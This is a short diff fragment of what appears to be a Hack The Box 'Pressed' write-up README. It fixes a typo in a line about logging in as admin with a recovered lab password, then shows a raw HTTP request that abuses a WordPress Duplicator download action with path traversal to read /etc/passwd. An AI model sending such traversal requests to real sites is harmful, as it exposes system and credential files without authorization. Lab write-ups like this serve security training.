nikip72/HTB/Pressed/README.md

 ...
 ```

-Again, we we try to login as user _admin_ and password _uhc-jan-finals-2022_ we can confirm the validity of the username/password pair, but we are asked for an OTP code.
+Again, we try to login as user _admin_ and password _uhc-jan-finals-2022_ we can confirm the validity of the username/password pair, but we are asked for an OTP code.
 Access to /etc/passwd
 ```
 GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../etc/passwd HTTP/1.1